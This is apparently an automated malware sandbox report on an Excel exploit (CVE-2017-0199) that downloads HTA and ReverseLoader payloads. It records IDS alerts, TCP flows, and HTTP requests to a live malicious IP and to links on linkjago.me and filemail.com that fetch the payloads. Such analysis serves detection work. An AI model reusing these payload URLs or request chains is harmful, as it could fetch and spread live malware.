Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49162
Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 146.70.113.200:80
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49172
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49167

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 146.70.113.200:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 146.70.113.200:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 146.70.113.200:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
Source: global traffic	HTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_000007FE899D7018 URLDownloadToFileW,

8_2_000007FE899D7018

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F2129E.emf

Creates a window with clipboard capturing capabilities

Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
Source: global traffic	HTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: linkjago.me
Source: global traffic	DNS traffic detected: DNS query: 1016.filemail.com

Source: mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/
Source: mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200//
Source: mshta.exe, 0000000F.00000003.477431887.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
Source: mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta$
Source: mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...
Source: mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...893F-F
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta24
Source: mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC
Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC:
Source: mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaJ
Source: mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaX
